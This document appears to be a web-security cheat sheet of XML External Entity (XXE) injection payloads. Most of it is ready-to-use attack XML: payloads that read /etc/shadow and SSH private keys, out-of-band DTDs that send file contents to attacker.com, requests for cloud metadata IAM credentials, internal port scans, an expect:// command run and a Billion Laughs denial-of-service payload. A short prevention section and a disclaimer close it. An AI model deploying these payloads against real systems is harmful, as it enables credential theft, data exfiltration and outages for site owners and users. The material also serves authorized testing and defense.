XXE (XML External Entity) Payloads
XXE (XML External Entity) injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It can lead to file disclosure, SSRF (Server-Side Request Forgery), port scanning, and remote code execution.
Basic XXE
Simple External Entity
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test "Hello World">]>
<root>&test;</root>
External Entity from File
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Testing for XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe "test">]>
<foo>&xxe;</foo>
File Disclosure
Linux/Unix Files
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<root>&xxe;</root>
Windows Files
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/boot.ini">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">]>
<root>&xxe;</root>
PHP Wrappers
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
Data URI
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "data://text/plain;base64,SGVsbG8gV29ybGQ=">]>
<root>&xxe;</root>
Blind XXE
When the application doesn't return the entity value directly.
Out-of-Band (OOB) XXE
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
<root>&xxe;</root>
DTD-Based Blind XXE
Malicious DTD hosted on attacker server (evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root>
Error-Based Blind XXE (Data Exfiltration)
evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
%error;
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root>&content;</root>
SSRF via XXE
Internal Network Scanning
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://192.168.1.1:80">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://localhost:8080">]>
<root>&xxe;</root>
Cloud Metadata Endpoints
AWS:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<root>&xxe;</root>
Google Cloud:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/">]>
<root>&xxe;</root>
Azure:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">]>
<root>&xxe;</root>
Port Scanning
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://internal-server:22">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://internal-server:3306">]>
<root>&xxe;</root>
XXE with Different Encodings
UTF-7
<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-DOCTYPE+ACA-root+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-xxe+ACA-SYSTEM+ACA-+ACI-file:///etc/passwd+ACI-+AD4-+AF0-+AD4-
+ADw-root+AD4-+ACY-xxe+ADs-+ADw-/root+AD4-
UTF-16
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Error-Based XXE
Trigger Errors to Exfiltrate Data
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<root></root>
Advanced Techniques
Parameter Entities
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&send;</root>
Nested Entities
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>">
%param1;
]>
<root>&exfil;</root>
Billion Laughs Attack (DoS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XInclude Attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
XML Injection in SOAP
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Body>
<foo>&xxe;</foo>
</soap:Body>
</soap:Envelope>
SVG File Upload
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
<text fontSize="16" x="0" y="16">&xxe;</text>
</svg>
XXE via Excel/Word Files
Excel and Word files (.xlsx, .docx) are actually ZIP archives containing XML files.
- Extract the archive
- Modify XML files (e.g.,
xl/workbook.xmlorword/document.xml) - Inject XXE payloads
- Repackage as ZIP and rename
Platform-Specific Payloads
Java
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">]>
<root>&xxe;</root>
.NET
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
Prevention Best Practices
- Disable External Entities: Disable DTDs entirely
- Use Simple Data Formats: Use JSON instead of XML when possible
- Update XML Processors: Keep parsers up-to-date
- Input Validation: Validate and sanitize XML input
- Whitelist Input: Only allow expected XML structure
- Disable XInclude: Disable XInclude processing
- Secure Configurations:
Python (lxml)
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse('input.xml', parser)
Java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
PHP
libxml_disable_entity_loader(true);
Testing Tools
- Burp Suite - XXE detection and exploitation
- XXEinjector - Automated XXE injection tool
- OWASP ZAP - Web security scanner
- xmllint - XML validator
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.